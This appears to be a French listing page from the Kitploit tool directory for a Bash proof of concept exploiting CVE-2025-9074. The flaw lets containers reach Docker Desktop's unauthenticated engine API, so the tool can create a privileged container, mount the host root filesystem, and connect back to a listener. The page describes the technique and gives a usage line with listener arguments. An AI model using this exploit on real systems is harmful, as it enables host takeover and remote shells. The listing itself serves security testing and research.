Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-9074-Poc — Exploit PoC basé sur Bash pour CVE-2025-9074 ciblant l'API Docker Engine non authentifiée pour réaliser une évasion de conteneur et une exécution de code à distance via un montage de volume privilégié. | Kitploit
Outils/GitHubGitHub/zaydbf/cve-2025-9074-poc
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionOutil d'Accès à DistanceÉvasion de Conteneur
GitHubzaydbf/cve-2025-9074-poc

CVE-2025-9074-Poc

Exploit PoC basé sur Bash pour CVE-2025-9074 ciblant l'API Docker Engine non authentifiée pour réaliser une évasion de conteneur et une exécution de code à distance via un montage de volume privilégié.

Voir le dépôt
2il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

RCE non authentifié via l'API Docker (CVE-2025-9074)

Une vulnérabilité critique CVE-2025-9074 dans Docker Desktop permet aux conteneurs Linux s'exécutant localement de se connecter à l'API du moteur Docker via le sous‑réseau par défaut (192.168.65.7:2375). Le problème persiste indépendamment de l'isolation renforcée des conteneurs (ECI) ou des paramètres d'exposition TCP. Un code d'exploitation de preuve de concept est publiquement disponible pour CVE-2025-9074. La vulnérabilité peut permettre un accès non autorisé aux fichiers utilisateur sur le système hôte. Par conséquent, le niveau de risque est classé comme risque élevé.

Un script Bash autonome pour exploiter les API Docker exposées (généralement le port 2375) sans authentification. Cet outil automatise l'évasion de conteneur via le montage de volumes, permettant l'exécution de code à distance.

Fonctionnalités

  • Zéro dépendance : Implémenté entièrement en Bash en utilisant des utilitaires standard tels que curl et grep. Aucun binaire externe ni outil tiers n'est requis.
  • Exploitation non authentifiée : Interagit directement avec l'API du moteur Docker sans authentification.
  • Création automatisée de conteneur : Crée et démarre automatiquement un conteneur privilégié.
  • Accès root à l'hôte : Monte le système de fichiers racine de l'hôte pour réaliser l'évasion du conteneur.
  • Portable : Fonctionne dans des environnements de conteneurs minimalistes avec un outillage limité.

Utilisation

root@kitploit:~
chmod +x exploit.sh
./exploit.sh [TARGET_IP] [PORT] -l <listener_ip> -p <listener_port>

Preuve de concept

image
Télécharger l’outil